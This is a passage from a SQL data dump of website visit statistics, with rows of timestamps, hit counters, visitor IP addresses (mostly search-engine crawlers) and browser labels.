'164.132.161.12','other'),(20248,1457893208,1,1,0,0,'51.255.65.10','other'),(20249,1457893389,1,0,1,0,'66.249.66.166',''),(20250,1457893496,1,0,1,0,'66.249.66.158',''),(20251,1457893644,1,1,0,0,'62.210.215.100','chrome'),(20252,1457894061,1,1,0,0,'217.69.133.216','other'),(20253,1457894222,1,1,0,0,'51.255.65.45','other'),(20254,1457894416,1,0,1,0,'207.46.13.105',''),(20255,1457894510,1,1,0,0,'8.29.198.25','other'),(20256,1457894531,1,1,0,0,'217.69.133.67','other'),(20257,1457894593,2,0,2,0,'66.249.66.162',''),(20258,1457894755,2,2,0,0,'40.77.167.11','other'),(20259,1457895173,1,1,0,0,'66.249.92.99','other'),(20260,1457895267,1,1,0,0,'82.145.211.207','other'),(20261,1457895281,1,1,0,0,'51.255.65.81','other'),(20262,1457895392,2,0,2,0,'66.249.66.166',''),(20263,1457895881,4,0,4,0,'66.249.66.158',''),(20264,1457895905,2,0,2,0,'66.249.66.162',''),(20265,1457896341,1,1,0,0,'141.8.142.60','other'),(20266,1457896342,4,4,0,0,'141.8.132.99','other'),(20268,1457896346,3,3,0,0,'141.8.183.14','other'),(20269,1457896348,2,2,0,0,'130.193.37.21','other'),(20270,1457896349,2,2,0,0,'5.255.253.100','other'),(20271,1457896350,3,3,0,0,'5.255.253.53','other'),(20272,1457896351,3,3,0,0,'93.158.152.9','other'),(20273,1457896352,2,0,2,0,'66.249.66.166',''),(20274,1457896353,6,6,0,0,'141.8.184.18','other'),(20275,1457896445,7,7,0,0,'178.154.149.11','other'),(20276,1457896688,1,0,1,0,'66.249.66.133',''),(20277,1457896897,1,1,0,0,'164.132.161.64','other'),(20278,1457896958,1,1,0,0,'80.91.162.99','other'),(20279,1457897055,4,0,4,0,'66.249.66.162',''),(20280,1457897084,1,1,0,0,'91.196.178.104','chrome'),(20281,1457897171,1,1,0,0,'164.132.161.35','other'),(20282,1457897235,4,0,4,0,'66.249.66.158',''),(20283,1457897262,3,3,0,0,'141.8.184.18','other'),(20284,1457897264,4,4,0,0,'141.8.183.14','other'),(20286,1457897266,2,2,0,0,'93.158.152.9','other'),(20287,1457897295,2,2,0,0,'5.255.253.53','other'),(20288,1457897296,3,3,0,0,'130.193.37.21','other'),(20289,1457897303,3,3,0,0,'141.8.132.99','other'),(20290,1457897304,2,2,0,0,'130.193.51.43','other'),(20291,1457897305,4,4,0,0,'130.193.51.81','other'),(20292,1457897306,2,2,0,0,'5.255.253.30','other'),(20294,1457897308,2,2,0,0,'178.154.149.9','other'),(20295,1457897343,1,1,0,0,'5.255.253.9','other'),(20296,1457897344,1,1,0,0,'141.8.132.79','other'),(20297,1457897345,3,3,0,0,'130.193.51.85','other'),(20298,1457897346,1,1,0,0,'5.255.253.62','other'),(20299,1457897452,2,0,2,0,'66.249.66.166',''),(20300,1457897465,1,1,0,0,'217.69.133.225','other'),(20301,1457897509,1,1,0,0,'37.9.122.203','other'),(20302,1457897823,2,2,0,0,'141.8.142.88','other'),(20303,1457897849,2,0,2,0,'66.249.66.190',''),(20304,1457898088,1,1,0,0,'141.8.142.55','other'),(20305,1457898092,2,2,0,0,'5.255.253.94','other'),(20307,1457898125,1,1,0,0,'130.193.51.45','other'),(20309,1457898142,1,1,0,0,'130.193.51.7','other'),(20310,1457898144,1,1,0,0,'141.8.132.2','other'),(20311,1457898150,1,1,0,0,'5.255.253.55','other'),(20312,1457898151,1,1,0,0,'178.154.149.11','other'),(20313,1457898155,1,1,0,0,'130.193.37.27','other'),(20314,1457898164,1,1,0,0,'5.255.253.110','other'),(20315,1457898180,1,1,0,0,'217.69.133.68','other'),(20316,1457898193,1,1,0,0,'141.8.183.14','other'),(20317,1457898195,1,1,0,0,'141.8.132.44','other'),(20318,1457898237,1,1,0,0,'51.255.65.50','other'),(20319,1457898433,1,1,0,0,'217.69.133.219','other'),(20320,1457898660,4,0,4,0,'66.249.66.158',''),(20321,1457898795,1,1,0,0,'164.132.161.57','other'),(20322,1457898939,1,1,0,0,'217.69.133.215','other'),(20323,1457898958,1,1,0,0,'141.8.132.99','other'),(20325,1457899525,1,1,0,0,'5.255.253.10','other'),(20326,1457899526,2,2,0,0,'141.8.132.76','other'),(20327,1457899822,1,1,0,0,'217.69.133.67','other'),(20328,1457899868,1,1,0,0,'217.69.133.219','other'),(20329,1457899869,1,1,0,0,'217.69.133.215','other'),(20330,1457900246,1,1,0,0,'66.249.66.129','other'),(20331,1457900260,1,1,0,0,'5.255.253.100','other'),(20332,1457900339,1,1,0,0,'5.255.253.55','other'),(20333,1457900340,1,1,0,0,'5.255.253.53','other'),(20334,1457900341,2,2,0,0,'130.193.51.45','other'),(20335,1457900343,2,2,0,0,'130.193.51.81','other'),(20337,1457900344,1,1,0,0,'141.8.142.41','other'),(20338,1457900345,1,1,0,0,'141.8.184.6','other'),(20340,1457900347,2,2,0,0,'5.255.253.9','other'),(20341,1457900348,3,3,0,0,'5.255.253.110','other'),(20342,1457900349,1,1,0,0,'130.193.51.85','other'),(20343,1457900350,1,1,0,0,'141.8.184.18','other'),(20344,1457900351,1,1,0,0,'130.193.37.21','other'),(20346,1457900354,1,1,0,0,'141.8.132.79','other'),(20347,1457900355,2,2,0,0,'141.8.142.8','other'),(20349,1457900356,1,1,0,0,'141.8.132.99','other'),(20350,1457900361,1,1,0,0,'178.154.149.11','other'),(20351,1457900362,1,1,0,0,'130.193.51.43','other'),(20352,1457900367,1,1,0,0,'93.158.152.9','other'),(20353,1457900501,1,1,0,0,'207.46.13.105','other'),(20354,1457900538,7,0,7,0,'66.249.66.158',''),(20355,1457900568,2,0,2,0,'66.249.66.162',''),(20356,1457900569,1,1,0,0,'164.132.161.45','other'),(20357,1457900614,1,0,1,0,'66.249.66.133',''),(20358,1457900738,1,1,0,0,'164.132.161.58','other'),(20359,1457900820,2,0,2,0,'66.249.66.166',''),(20360,1457901329,1,1,0,0,'51.255.65.21','other'),(20361,1457901441,1,1,0,0,'66.249.66.162','other'),(20362,1457902117,1,1,0,0,'207.46.13.184','other'),(20363,1457902163,3,0,3,0,'66.249.66.158',''),(20364,1457903259,3,0,3,0,'66.249.66.166',''),(20365,1457903611,1,1,0,0,'217.69.133.226','other'),(20366,1457903612,1,1,0,0,'217.69.133.68','other'),(20367,1457904111,2,0,2,0,'66.249.66.162',''),(20368,1457904129,7,7,0,0,'93.158.152.9','other'),(20369,1457904131,1,1,0,0,'178.154.149.11','other'),(20370,1457904132,2,2,0,0,'141.8.183.14','other'),(20371,1457904133,5,5,0,0,'141.8.184.18','other'),(20372,1457904137,1,1,0,0,'130.193.37.21','other'),(20373,1457904169,8,0,8,0,'66.249.66.158',''),(20374,1457904480,1,1,0,0,'217.69.133.217','other'),(20375,1457904687,1,1,0,0,'62.210.215.100','chrome'),(20376,1457904849,1,1,0,0,'51.255.65.66','other'),(20377,1457905150,1,1,0,0,'51.255.65.58','other'),(20378,1457905206,1,1,0,0,'182.118.21.212','msie'),(20379,1457905478,1,1,0,0,'8.29.198.26','other'),(20380,1457905833,1,1,0,0,'164.132.161.41','other'),(20381,1457906149,3,3,0,0,'141.8.183.14','other'),(20383,1457906150,1,1,0,0,'178.154.149.11','other'),(20385,1457906152,1,1,0,0,'141.8.184.18','other'),(20386,1457906153,1,1,0,0,'93.158.152.9','other'),(20387,1457906201,2,0,2,0,'66.249.66.162',''),(20388,1457906222,3,0,3,0,'66.249.66.158',''),(20389,1457906452,1,1,0,0,'66.249.92.103','other'),(20390,1457906955,1,1,0,0,'207.46.13.105','other'),(20391,1457907059,1,0,1,0,'66.249.66.190',''),(20392,1457907223,1,0,1,0,'68.180.230.88',''),(20393,1457907227,1,0,1,0,'66.249.66.166',''),(20394,1457907511,1,0,1,0,'66.249.66.158',''),(20395,1457908021,1,1,0,0,'101.226.168.242','chrome'),(20396,1457908414,1,1,0,0,'141.8.184.18','other'),(20397,1457908418,1,1,0,0,'130.193.37.21','other'),(20398,1457908422,2,0,2,0,'66.249.66.158',''),(20399,1457908432,4,4,0,0,'157.55.39.20','other'),(20400,1457908461,3,0,3,0,'66.249.66.166',''),(20401,1457908761,1,1,0,0,'5.255.253.53','other'),(20402,1457909327,2,0,2,0,'66.249.66.162',''),(20403,1457909477,2,0,2,0,'66.249.66.166',''),(20404,1457909494,1,1,0,0,'141.8.183.14','other'),(20405,1457910351,5,5,0,0,'93.158.152.9','other'),(20406,1457910355,4,4,0,0,'141.8.184.18','other'),(20407,1457910445,1,0,1,0,'66.249.66.129',''),(20408,1457910785,1,1,0,0,'141.8.132.74','other'),(20409,1457910789,2,2,0,0,'5.255.253.103','other'),(20410,1457910793,1,1,0,0,'130.193.50.22','other'),(20411,1457910801,1,1,0,0,'93.158.152.65','other'),(20412,1457910805,1,1,0,0,'141.8.132.66','other'),(20413,1457910809,1,1,0,0,'5.255.253.89','other'),(20414,1457910813,2,2,0,0,'130.193.51.22','other'),(20415,1457910817,1,1,0,0,'5.255.253.100','other'),(20416,1457910821,1,1,0,0,'130.193.51.43','other'),(20417,1457910825,1,1,0,0,'141.8.132.2','other'),(20418,1457910830,2,2,0,0,'141.8.184.11','other'),(20419,1457910834,1,1,0,0,'141.8.142.10','other'),(20420,1457910838,1,1,0,0,'5.255.253.9','other'),(20421,1457910842,5,5,0,0,'5.255.253.53','other'),(20422,1457910846,2,2,0,0,'5.255.253.110','other'),(20423,1457910850,1,1,0,0,'141.8.132.79','other'),(20424,1457910854,2,2,0,0,'130.193.51.85','other'),(20425,1457910858,1,1,0,0,'5.255.253.51','other'),(20426,1457910867,1,1,0,0,'141.8.132.97','other'),(20427,1457910875,1,1,0,0,'130.193.37.27','other'),(20428,1457910884,6,6,0,0,'141.8.183.14','other'),(20429,1457910888,3,3,0,0,'178.154.149.11','other'),(20430,1457910896,2,2,0,0,'141.8.132.99','other'),(20431,1457910901,2,2,0,0,'178.154.189.12','other'),(20432,1457910907,1,1,0,0,'217.69.133.217','other'),(20433,1457910909,1,1,0,0,'5.255.253.17','other'),(20434,1457910956,1,1,0,0,'5.255.253.10','other'),(20435,1457910960,1,1,0,0,'5.255.253.55','other'),(20436,1457911091,1,1,0,0,'217.69.133.85','other'),(20437,1457911528,1,0,1,0,'66.249.66.166',''),(20438,1457911745,1,0,1,0,'66.249.66.129',''),(20439,1457911943,2,0,2,0,'68.180.230.88',''),(20440,1457912713,2,0,2,0,'66.249.66.158',''),(20441,1457912740,1,0,1,0,'66.249.66.129',''),(20442,1457912807,1,0,1,0,'66.249.66.162',''),(20443,1457912963,1,0,1,0,'66.249.66.166',''),(20444,1457913014,1,1,0,0,'51.255.65.54','other'),(20445,1457913655,1,1,0,0,'180.76.15.158','other'),(20446,1457913690,1,1,0,0,'164.132.161.33','other'),(20447,1457913982,1,0,1,0,'68.180.230.88',''),(20448,1457914394,1,1,0,0,'207.46.13.184','other'),(20449,1457914660,3,0,3,0,'66.249.66.166',''),(20450,1457914850,1,1,0,0,'66.249.66.162','other'),(20451,1457914875,1,1,0,0,'178.154.149.11','other'),(20452,1457914879,1,1,0,0,'141.8.184.18','other'),(20453,1457915380,1,1,0,0,'157.55.39.20','other'),(20454,1457915516,2,2,0,0,'62.210.215.100','chrome'),(20455,1457915550,1,1,0,0,'66.249.66.129','other'),(20456,1457915771,1,0,1,0,'68.180.230.88',''),(20457,1457915775,2,0,2,0,'66.249.66.166',''),(20458,1457915908,1,1,0,0,'207.46.13.105','other'),(20459,1457916216,1,0,1,0,'66.249.66.158',''),(20460,1457916298,1,1,0,0,'8.29.198.25','other'),(20461,1457916347,1,1,0,0,'194.116.244.2','firefox'),(20462,1457916547,9,9,0,0,'5.255.253.53','other'),(20463,1457916550,5,5,0,0,'141.8.184.18','other'),(20464,1457916554,2,2,0,0,'93.158.152.9','other'),(20465,1457916567,3,3,0,0,'178.154.149.11','other'),(20466,1457916734,4,4,0,0,'141.8.183.14','other'),(20467,1457916746,1,1,0,0,'5.255.253.100','other'),(20468,1457916763,1,1,0,0,'141.8.132.99','other'),(20469,1457916796,1,1,0,0,'130.193.51.43','other'),(20470,1457916950,1,1,0,0,'66.249.66.158','other'),(20471,1457917010,1,1,0,0,'66.249.92.95','other'),(20472,1457917641,1,1,0,0,'167.114.237.177','other'),(20473,1457918071,1,0,1,0,'68.180.230.88',''),(20474,1457918331,1,1,0,0,'207.46.13.188','other'),(20475,1457918351,3,1,2,0,'66.249.66.166',''),(20476,1457918520,1,1,0,0,'51.255.65.44','other'),(20477,1457918825,1,0,1,0,'66.249.66.158',''),(20478,1457918868,1,1,0,0,'5.255.253.100','other'),(20479,1457918872,1,1,0,0,'5.255.253.53','other'),(20480,1457918876,1,1,0,0,'178.154.149.11','other'),(20481,1457918880,1,1,0,0,'141.8.184.18','other'),(20482,1457918884,1,1,0,0,'141.8.132.109','other'),(20483,1457919012,1,0,1,0,'66.249.66.162',''),(20484,1457919330,1,1,0,0,'66.249.66.166','other'),(20485,1457919725,1,1,0,0,'217.69.133.226','other'),(20486,1457919845,1,1,0,0,'164.132.161.66','other'),(20487,1457920022,1,0,1,0,'66.249.66.158',''),(20488,1457920265,1,0,1,0,'66.249.66.162',''),(20489,1457920494,2,0,2,0,'66.249.66.166',''),(20490,1457920619,1,1,0,0,'217.69.133.215','other'),(20491,1457920620,1,1,0,0,'217.69.133.219','other'),(20492,1457920711,51,51,0,0,'82.193.127.15','other'),(20493,1457920818,1,0,1,0,'68.180.230.88',''),(20494,1457921508,2,0,2,0,'66.249.66.158',''),(20495,1457921634,37,37,0,0,'82.193.127.15','other'),(20496,1457921664,2,2,0,0,'66.249.66.166','other'),(20497,1457921743,1,1,0,0,'178.154.149.11','other'),(20498,1457921856,2,2,0,0,'130.193.50.22','other'),(20499,1457921860,1,1,0,0,'93.158.152.26','other'),(20500,1457921864,1,1,0,0,'141.8.184.18','other'),(20501,1457921868,1,1,0,0,'5.255.253.53','other'),(20502,1457922024,1,1,0,0,'217.69.133.218','other'),(20503,1457922105,1,1,0,0,'54.204.157.153','firefox'),(20504,1457922142,1,0,1,0,'66.249.66.162',''),(20505,1457922410,3,3,0,0,'66.249.66.133','other'),(20506,1457922460,1,1,0,0,'95.142.161.63','chrome'),(20507,1457922488,1,1,0,0,'158.69.192.220','chrome'),(20508,1457922540,21,21,0,0,'82.193.127.15','other'),(20509,1457922643,2,2,0,0,'66.249.66.129','other'),(20510,1457922666,1,0,1,0,'66.249.66.166',''),(20511,1457922674,2,2,0,0,'207.46.13.192','other'),(20512,1457922879,3,2,1,0,'66.249.66.162',''),(20513,1457923160,2,2,0,0,'66.249.66.190','other'),(20514,1457923692,49,49,0,0,'82.193.127.15','other'),(20515,1457923710,1,1,0,0,'141.8.142.8','other'),(20516,1457923714,1,1,0,0,'130.193.37.27','other'),(20517,1457923718,1,1,0,0,'141.8.132.79','other'),(20518,1457923723,1,1,0,0,'5.255.253.110','other'),(20519,1457923747,1,1,0,0,'141.8.132.97','other'),(20520,1457923752,2,2,0,0,'178.154.149.11','other'),(20521,1457923756,1,1,0,0,'141.8.142.88','other'),(20522,1457923760,1,1,0,0,'5.255.253.10','other'),(20523,1457924076,1,1,0,0,'40.77.167.11','other'),(20524,1457924360,1,1,0,0,'51.255.65.90','other'),(20525,1457924448,1,0,1,0,'68.180.230.88',''),(20526,1457924596,38,38,0,0,'82.193.127.15','other'),(20527,1457924601,1,1,0,0,'66.249.66.162','other'),(20528,1457925021,1,1,0,0,'66.249.66.166','other'),(20529,1457925076,1,1,0,0,'217.69.133.68','other'),(20530,1457925081,1,1,0,0,'217.69.133.220','other'),(20531,1457925442,3,3,0,0,'66.249.66.129','other'),(20532,1457925505,40,40,0,0,'82.193.127.15','other'),(20533,1457926048,2,2,0,0,'62.210.215.100','chrome'),(20534,1457926114,2,0,2,0,'66.249.66.158',''),(20535,1457926142,1,1,0,0,'66.249.66.166','other'),(20536,1457926375,1,1,0,0,'93.158.152.9','other'),(20537,1457926379,1,1,0,0,'130.193.51.45','other'),(20538,1457926383,3,3,0,0,'178.154.149.11','other'),(20539,1457926387,4,4,0,0,'141.8.184.18','other'),(20540,1457926406,48,48,0,0,'82.193.127.15','other'),(20541,1457926854,2,2,0,0,'217.69.133.85','other'),(20542,1457926859,1,1,0,0,'217.69.133.218','other'),(20543,1457927140,1,1,0,0,'8.29.198.25','other'),(20544,1457927357,49,49,0,0,'82.193.127.15','other'),(20545,1457927751,1,1,0,0,'66.249.92.103','other'),(20546,1457927870,1,1,0,0,'217.69.133.215','other'),(20547,1457928293,16,16,0,0,'141.8.184.18','other'),(20548,1457928301,2,2,0,0,'141.8.183.14','other'),(20549,1457928310,2,2,0,0,'178.154.149.11','other'),(20550,1457928379,2,0,2,0,'66.249.66.166',''),(20551,1457928380,3,2,1,0,'66.249.66.162',''),(20552,1457928474,1,1,0,0,'66.249.66.190','other'),(20553,1457928540,1,1,0,0,'220.181.108.141','other'),(20554,1457928858,1,0,1,0,'66.249.66.158',''),(20555,1457929034,1,1,0,0,'66.249.66.129','other'),(20556,1457929369,3,0,3,0,'66.249.66.162',''),(20557,1457929471,1,0,1,0,'66.249.66.166',''),(20558,1457930017,1,1,0,0,'130.193.51.102','other'),(20559,1457930019,1,1,0,0,'141.8.183.14','other'),(20560,1457930022,2,2,0,0,'141.8.184.11','other'),(20561,1457930024,1,1,0,0,'141.8.132.76','other'),(20562,1457930027,1,1,0,0,'5.255.253.100','other'),(20563,1457930202,1,1,0,0,'141.8.184.18','other'),(20566,1457930203,2,2,0,0,'141.8.132.2','other'),(20567,1457930204,1,1,0,0,'141.8.142.10','other'),(20569,1457930205,1,1,0,0,'5.255.253.30','other'),(20571,1457930206,1,1,0,0,'130.193.51.85','other'),(20572,1457930207,1,1,0,0,'93.158.152.9','other'),(20574,1457930208,3,3,0,0,'5.255.253.10','other'),(20575,1457930209,3,3,0,0,'130.193.51.81','other'),(20576,1457930210,2,2,0,0,'141.8.142.88','other'),(20577,1457930211,3,3,0,0,'130.193.37.27','other'),(20578,1457930212,3,3,0,0,'178.154.149.11','other'),(20580,1457930218,2,2,0,0,'141.8.132.99','other'),(20581,1457930343,20,20,0,0,'144.76.93.46','other'),(20582,1457930807,10,1,9,0,'66.249.66.158',''),(20583,1457930939,1,0,1,0,'66.249.66.162',''),(20584,1457930951,1,0,1,0,'66.249.66.129',''),(20585,1457931053,2,0,2,0,'66.249.66.166',''),(20586,1457931086,1,1,0,0,'66.249.66.162','other'),(20587,1457931413,1,1,0,0,'66.249.66.190','other'),(20588,1457931608,1,1,0,0,'217.69.133.222','other'),(20590,1457931765,2,2,0,0,'217.69.133.67','other'),(20591,1457931767,1,1,0,0,'217.69.133.84','other'),(20592,1457931768,1,1,0,0,'217.69.133.215','other'),(20593,1457932344,1,1,0,0,'66.249.66.162','other'),(20594,1457932427,2,2,0,0,'5.255.253.53','other'),(20595,1457932428,2,2,0,0,'5.255.253.100','other'),(20597,1457932429,1,1,0,0,'141.8.184.11','other'),(20598,1457932430,2,2,0,0,'130.193.51.81','other'),(20599,1457932431,1,1,0,0,'130.193.51.102','other'),(20601,1457932432,1,1,0,0,'141.8.132.79','other'),(20602,1457932433,1,1,0,0,'130.193.51.85','other'),(20603,1457932436,1,1,0,0,'93.158.152.26','other'),(20605,1457932437,1,1,0,0,'5.255.253.30','other'),(20606,1457932438,1,1,0,0,'141.8.142.41','other'),(20608,1457932439,1,1,0,0,'130.193.37.21','other'),(20609,1457932440,1,1,0,0,'130.193.51.45','other'),(20610,1457932441,1,1,0,0,'5.255.253.10','other'),(20612,1457932443,1,1,0,0,'141.8.184.22','other'),(20614,1457932764,1,1,0,0,'66.249.66.158','other'),(20615,1457932932,1,1,0,0,'180.76.15.6','other'),(20616,1457933238,2,0,2,0,'66.249.66.166',''),(20617,1457933360,1,1,0,0,'180.76.15.136','other'),(20618,1457933700,1,0,1,0,'66.249.66.129',''),(20619,1457933971,1,0,1,0,'66.249.66.162',''),(20620,1457935799,1,0,1,0,'68.180.229.111',''),(20621,1457935849,1,0,1,0,'66.249.66.158',''),(20622,1457936031,1,0,1,0,'68.180.229.41',''),(20623,1457936154,1,1,0,0,'78.111.185.29','chrome'),(20624,1457936346,1,1,0,0,'217.69.133.221','other'),(20625,1457936632,3,3,0,0,'93.158.152.26','other'),(20627,1457936633,2,2,0,0,'5.255.253.9','other'),(20628,1457936634,2,2,0,0,'130.193.51.81','other'),(20629,1457936635,2,2,0,0,'141.8.184.22','other'),(20630,1457936638,1,1,0,0,'141.8.132.97','other'),(20631,1457936639,1,1,0,0,'130.193.51.102','other'),(20633,1457936640,1,1,0,0,'141.8.132.76','other'),(20634,1457936641,1,1,0,0,'141.8.132.79','other'),(20636,1457936642,1,1,0,0,'141.8.142.41','other'),(20637,1457936643,1,1,0,0,'141.8.142.8','other'),(20638,1457936644,1,1,0,0,'141.8.184.18','other'),(20639,1457936645,1,1,0,0,'178.154.149.11','other'),(20640,1457936646,1,1,0,0,'93.158.152.9','other'),(20641,1457936647,1,1,0,0,'5.255.253.53','other'),(20642,1457936648,1,1,0,0,'130.193.37.21','other'),(20643,1457936649,1,1,0,0,'141.8.132.99','other'),(20644,1457936650,2,2,0,0,'5.255.253.100','other'),(20645,1457936651,2,2,0,0,'130.193.51.45','other'),(20646,1457936652,2,2,0,0,'130.193.51.43','other'),(20647,1457936653,2,2,0,0,'5.255.253.10','other'),(20648,1457936654,2,2,0,0,'141.8.184.11','other'),(20649,1457936885,1,1,0,0,'195.234.6.11','chrome'),(20650,1457936959,1,0,1,0,'66.249.66.129',''),(20651,1457936989,1,1,0,0,'141.8.142.10','other'),(20652,1457937412,1,1,0,0,'217.69.133.85','other'),(20653,1457937425,34,34,0,0,'82.193.127.15','other'),(20654,1457937601,1,1,0,0,'91.196.178.71','firefox'),(20655,1457937707,1,1,0,0,'91.196.178.33','chrome'),(20656,1457937738,1,1,0,0,'89.145.95.40','other'),(20657,1457937827,1,1,0,0,'91.196.178.101','chrome'),(20658,1457938051,1,1,0,0,'8.29.198.25','other'),(20659,1457938140,1,1,0,0,'66.249.92.99','other'),(20660,1457938427,2,2,0,0,'217.69.133.67','other'),(20661,1457938446,1,1,0,0,'66.102.9.104','chrome'),(20662,1457938531,1,1,0,0,'62.210.215.100','chrome'),(20663,1457938826,1,1,0,0,'194.187.106.118','chrome'),(20664,1457939002,1,1,0,0,'91.196.178.69','firefox'),(20665,1457939135,1,1,0,0,'91.196.178.71','chrome'),(20666,1457939198,1,1,0,0,'164.132.161.20','other'),(20667,1457939222,1,1,0,0,'5.255.253.10','other'),(20668,1457939223,1,1,0,0,'5.255.253.9','other'),(20669,1457939224,1,1,0,0,'141.8.132.97','other'),(20670,1457939225,1,1,0,0,'141.8.142.88','other'),(20671,1457939226,1,1,0,0,'5.255.253.55','other'),(20672,1457939332,1,1,0,0,'66.249.66.158','other'),(20673,1457939603,1,1,0,0,'77.52.180.238','chrome'),(20674,1457940559,1,0,1,0,'66.249.66.166',''),(20675,1457941691,2,2,0,0,'217.69.133.223','other'),(20676,1457941856,1,1,0,0,'46.133.253.40','chrome'),(20677,1457942093,240,240,0,0,'82.193.127.15','other'),(20678,1457942469,2,2,0,0,'91.196.178.70','chrome'),(20679,1457942479,1,1,0,0,'217.69.133.68','other'),(20680,1457942638,1,1,0,0,'66.249.66.129','other'),(20681,1457942668,1,0,1,0,'66.249.66.158',''),(20682,1457942670,1,1,0,0,'46.119.234.122','chrome'),(20683,1457942918,1,0,1,0,'66.249.66.166',''),(20684,1457943338,1,1,0,0,'178.154.149.11','other'),(20685,1457943339,1,1,0,0,'93.158.152.9','other'),(20687,1457943340,1,1,0,0,'5.255.253.53','other'),(20688,1457943515,2,2,0,0,'207.46.13.192','other'),(20689,1457943584,1,1,0,0,'91.196.178.71','firefox'),(20690,1457943652,1,1,0,0,'94.179.9.167','chrome'),(20691,1457943749,1,1,0,0,'180.76.15.145','other'),(20692,1457943774,1,1,0,0,'164.132.161.28','other'),(20693,1457944030,2,2,0,0,'91.196.178.71','chrome'),(20694,1457944063,1,1,0,0,'78.111.185.59','firefox'),(20695,1457944320,1,0,1,0,'66.249.66.166',''),(20696,1457944634,1,1,0,0,'91.196.178.39','firefox'),(20697,1457944720,1,1,0,0,'217.69.133.84','other'),(20698,1457944775,1,1,0,0,'94.179.110.238','chrome'),(20699,1457944943,1,1,0,0,'178.154.189.12','other'),(20700,1457944944,1,1,0,0,'178.154.149.11','other'),(20701,1457944945,1,1,0,0,'141.8.132.99','other'),(20703,1457945448,3,3,0,0,'91.196.178.71','firefox'),(20704,1457945663,1,1,0,0,'130.193.51.39','other'),(20705,1457945667,1,1,0,0,'141.8.184.16','other'),(20706,1457945671,1,1,0,0,'130.193.51.48','other'),(20707,1457945675,1,1,0,0,'141.8.132.94','other'),(20708,1457945679,1,1,0,0,'141.8.142.92','other'),(20709,1457945894,1,1,0,0,'91.196.178.135','chrome'),(20710,1457946049,1,1,0,0,'46.201.239.218','firefox'),(20711,1457946148,1,1,0,0,'91.196.178.67','chrome'),(20712,1457946503,1,0,1,0,'66.249.66.158',''),(20713,1457946628,1,1,0,0,'91.196.178.70','firefox'),(20714,1457946783,22,22,0,0,'94.154.239.69','other'),(20715,1457947213,1,1,0,0,'51.255.65.97','other'),(20716,1457947840,1,0,1,0,'66.249.66.166',''),(20717,1457947902,1,1,0,0,'91.124.34.75','chrome'),(20718,1457948154,1,1,0,0,'180.76.15.149','other'),(20719,1457948402,1,0,1,0,'68.180.230.35',''),(20720,1457948531,1,1,0,0,'91.196.178.68','firefox'),(20721,1457948830,1,1,0,0,'66.249.92.95','other'),(20722,1457948893,1,1,0,0,'217.69.133.217','other'),(20723,1457948977,1,1,0,0,'8.29.198.25','other'),(20724,1457949037,1,1,0,0,'62.210.215.100','chrome'),(20725,1457949523,2,2,0,0,'91.196.178.68','firefox'),(20726,1457949592,1,1,0,0,'157.55.39.252','other'),(20727,1457949808,1,1,0,0,'217.69.133.215','other'),(20728,1457949853,2,0,2,0,'66.249.66.158',''),(20729,1457950053,1,1,0,0,'164.132.161.33','other'),(20730,1457950095,1,0,1,0,'68.180.230.35',''),(20731,1457950188,1,1,0,0,'217.69.133.85','other'),(20732,1457950189,1,1,0,0,'217.69.133.67','other'),(20733,1457950238,1,1,0,0,'178.151.170.147','firefox'),(20734,1457950838,2,0,2,0,'66.249.66.158',''),(20735,1457951018,1,0,1,0,'66.249.66.166',''),(20736,1457951350,1,1,0,0,'5.255.253.100','other'),(20737,1457951450,1,1,0,0,'91.124.36.32','firefox'),(20738,1457951496,1,1,0,0,'94.179.9.167','chrome'),(20739,1457951518,2,0,2,0,'66.249.66.162',''),(20740,1457951986,2,0,2,0,'68.180.230.35',''),(20741,1457952260,1,0,1,0,'66.249.66.166',''),(20742,1457952278,2,0,2,0,'66.249.66.158',''),(20743,1457952352,1,1,0,0,'91.196.178.39','chrome'),(20744,1457952700,2,2,0,0,'66.249.66.162','other'),(20745,1457952709,1,1,0,0,'195.68.202.190','chrome'),(20746,1457952778,1,1,0,0,'95.133.79.150','chrome'),(20747,1457952842,1,1,0,0,'37.53.90.175','firefox'),(20748,1457953317,1,1,0,0,'178.154.149.11','other'),(20749,1457953319,1,1,0,0,'130.193.37.21','other'),(20750,1457953323,1,1,0,0,'141.8.183.14','other'),(20751,1457953327,1,1,0,0,'141.8.132.2','other'),(20752,1457953331,1,1,0,0,'5.255.253.10','other'),(20753,1457953335,1,1,0,0,'5.255.253.53','other'),(20754,1457953338,1,1,0,0,'141.8.132.99','other'),(20755,1457953342,1,1,0,0,'141.8.184.22','other'),(20756,1457953346,1,1,0,0,'5.255.253.30','other'),(20757,1457953585,1,1,0,0,'207.46.13.192','other'),(20758,1457953728,4,1,3,0,'66.249.66.166',''),(20759,1457953793,1,1,0,0,'207.46.13.188','other'),(20760,1457954130,1,1,0,0,'217.69.133.216','other'),(20761,1457954523,1,1,0,0,'95.132.56.192','chrome'),(20762,1457954683,1,1,0,0,'182.118.25.225','msie'),(20763,1457954697,1,1,0,0,'51.255.65.48','other'),(20764,1457954893,1,1,0,0,'91.196.178.69','firefox'),(20765,1457955126,1,1,0,0,'51.255.65.23','other'),(20766,1457955274,1,1,0,0,'94.179.103.187','chrome'),(20767,1457955305,1,1,0,0,'217.69.133.217','other'),(20768,1457955321,1,1,0,0,'157.55.39.252','other'),(20769,1457955575,1,1,0,0,'91.196.178.163','firefox'),(20770,1457956120,1,1,0,0,'141.8.184.11','other'),(20771,1457956122,1,1,0,0,'178.154.149.11','other'),(20772,1457956126,2,2,0,0,'141.8.183.14','other'),(20773,1457956133,1,1,0,0,'141.8.142.10','other'),(20774,1457956137,1,1,0,0,'5.255.253.9','other'),(20775,1457956140,1,1,0,0,'5.255.253.53','other'),(20776,1457956143,1,1,0,0,'141.8.184.18','other'),(20777,1457956145,1,1,0,0,'195.225.144.88','chrome'),(20778,1457956147,1,1,0,0,'93.158.152.26','other'),(20779,1457956270,1,0,1,0,'66.249.66.129',''),(20780,1457956281,191,191,0,0,'94.154.239.69','other'),(20781,1457956309,36,36,0,0,'69.30.236.2','other'),(20782,1457956330,1,1,0,0,'207.46.13.188','other'),(20783,1457956531,2,0,2,0,'66.249.66.158',''),(20784,1457956996,1,1,0,0,'82.207.118.5','chrome'),(20785,1457957009,1,1,0,0,'157.55.39.252','other'),(20786,1457957048,2,0,2,0,'66.249.66.166',''),(20787,1457957143,1,0,1,0,'68.180.230.35',''),(20788,1457957183,9,9,0,0,'94.154.239.69','other'),(20789,1457957517,1,1,0,0,'91.196.178.101','chrome'),(20790,1457957944,1,1,0,0,'141.8.142.60','other'),(20791,1457957946,1,1,0,0,'5.255.253.17','other'),(20792,1457957950,1,1,0,0,'141.8.132.97','other'),(20793,1457957953,1,1,0,0,'141.8.132.76','other'),(20794,1457957956,1,